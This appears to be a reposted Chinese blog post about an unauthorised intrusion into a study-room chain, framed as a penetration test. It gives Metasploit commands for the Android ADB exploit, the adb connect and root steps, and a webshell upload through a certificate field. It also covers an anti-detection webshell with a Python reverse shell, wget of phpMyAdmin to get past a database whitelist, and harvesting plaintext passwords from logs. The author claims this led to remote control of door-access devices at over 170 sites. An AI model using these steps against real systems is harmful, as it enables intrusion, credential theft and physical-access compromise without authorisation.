前端時間找了個自習室學習，因為自習室網絡不太好就無聊掃了一下網段，發現了一臺Ampak Technology機器

以為是筆記本電腦(自習室一般都是用手機比較多),就掃了一下詳細信息:

發現開了5555，之前對這個端口沒了解過，就百度了一下發現是adb服務，剛好看到一篇文章:

(https://www.cnblogs.com/guaishoujingling/p/11101649.html）

是打靶機，不過看到說是2016年的洞了，也沒想能利用成功，就msf用了一下:

search adb

use exploit/android/adb/adb_server_exec

設置目標ip:

set RHOSTS 192.168.2.34

設置自己的ip:

set LHOST 192.168.2.136

我直接貼run的截圖了:

這里利用成功后是不返回shell的，要利用adb連接，安裝adb:

brew cask install android-platform-tools

安裝成功后連接目標:

adb connect 192.168.2.34:5555

adb devices 查看一下連接狀態是成功連接了:

adb shell直接遠程命令執行發現不是root權限，su成功拿到root權限:

截個圖看看:

adb shell screencap -p /sdcard/screen.png

通過adb漏洞實際已經可以利用root來操控門禁系統了(比如kill掉服務，清除鎖屏密碼等),但是這些操作會被自習室管理員知道，我想要通過遠程在管理員不知道的情況下來操作門禁系統還是不行的...

繼續利用，通過手機平板上面的信息知道了用戶id是xxxxxx，還知道了平板是xx科技的，然后谷歌和掃描找到了xx科技的用戶管理登錄界面和api文檔。

知道了要實現操作門禁系統需要用戶apiid和apikey還要acsurl，這些信息都是登錄后要找的，通過爆破無果，找xx科技的客服要了測試賬號和密碼看了看后臺也沒有什么能利用的洞。

只能返回到平板，既然是通過網絡對接平板，平板上肯定有用戶信息。

通過抓取網絡數據包和查看安裝app包發現com.xxx.aidoor是xx科技對接門禁的app，

于是find了一下com.xxx.aidoor,找到了com.xxx.aidoor的數據庫，在數據庫中并沒有找到api對接所需要的信息，但是找到了一個web網址:

通過這個地址繼續收集信息知道自習室系統的管理登錄界面和用戶登錄界面，掃了一下端口和信息，發現是阿里云的服務器，寶塔面板。

這里21，22的利用肯定是放到后面沒辦法了再回來搞，看了看svn也沒什么可以搞的，幾個頁面也沒什么信息，寶塔和think6.0.2,搜了下相關漏洞也沒什么能搞的，只能靠自己了。

在自習室系統的登錄界面(上面說的xx科技登錄是iot設備的登錄界面)發現了可以找客戶要使用賬戶，于是加上客服微信要到了試用賬號:

拿到后臺試用的能利用的漏洞，找到了xss和越權，但是比較雞肋，利用困難，不是重點這里就不貼了，一直找啊找找啊找終于找到了一處上傳點不是傳到騰訊云儲存的，

因為后臺和美團還有商戶微信對接，所以要上傳證書文件，可以直接改后綴上傳，傳了一個phpinfo看了一下

寶塔禁用的函數實在是太多了，加上阿里云會報警，

這里小技巧:

傳個過寶塔函數的免殺馬+python反彈shell可以避免阿里云報警成功無痕跡getshell

有了交互shell接下來的事情就好辦多了，find一下config找到了mysql信息:

這里發現用的是阿里云的rds數據庫，站庫分離，我本地連接不上，推測是做了白名單限制，有了交互式shell白名單限制形同虛設好嘛~wget一份phpmyadmin過去，成功繞過:

不過數據都是進行加密的，連著查了幾條都解不開，推測是自寫加密。

這能難倒我?

滲透測試的本質就是信息收集好吧，通過對服務器文件進行信息收集發現在xxx文件夾下存放著用戶登錄的log，通過log可以直接查看用戶登錄的明文密碼:

成功拿到總管理賬號，這套自習室系統的用戶還是不少的，全國170多家:

這個自習室管理系統是和我一開始adb漏洞利用的那個門禁平板的公司合作的，因為后臺對接了門禁系統，所以可以直接在后臺通過對自習室管理看到門禁系統的賬號密碼，進而可以遠程控制全國170多家自習室的iot設備

完

?

總結

以上是生活随笔為你收集整理的对某自习室系统的一次渗透测试(从iot到getshell再到控制全国自习室)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。